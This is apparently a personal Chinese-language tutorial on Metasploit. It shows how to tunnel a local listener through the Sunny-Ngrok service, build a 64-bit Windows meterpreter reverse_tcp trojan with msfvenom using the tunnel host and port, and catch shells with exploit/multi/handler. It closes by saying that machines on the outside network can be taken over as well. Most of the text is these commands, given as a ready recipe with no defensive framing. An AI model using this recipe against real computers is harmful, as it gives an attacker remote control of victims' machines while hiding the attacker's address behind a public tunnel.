metasploit学习--Sunny-Ngrok内网穿透

一、Sunny-Ngrok内网穿透
1.首先去官网注册账号，然后购买隧道

2.选择开通隧道，选免费的那个，然后选择tcp,其他随便写，本地端口就写127.0.0.1:xxx实际端口

3.下载客户端http://www.ngrok.cc/download.html，什么版本就下对应版本

4.登陆隧道./sunny clientid 隧道id

查看隧道id

5.生成木马

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=xxx.idcfengye.com LPORT=xxxx -f exe -o shell.exe

这里的LHOST=xxx.idcfengye.com是获取到的服务器地址免费的一般是free，LPORT是你刚刚设置的隧道端口比如我的是10210，那么这里就填10210，对应版本的木马在前面更改一下就可以了。
注意：
-a x64位，一定要对应-p x64位。
简单点来说，生成的exe是64位的，最好是只在64位的电脑上去运行。
千万不要把生成32位的exe放到64位的电脑上去运行，那样会造成失败或内存、CPU很高的情况。
6.msf开启监听，使用模块

msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > set lport xxxx
msf5 exploit(multi/handler) > exploit

这里的端口是你设置的本地端口，我设置的是2333，那么就填2333，一切就绪就run
7.结果，获取成功

外网主机也可以获取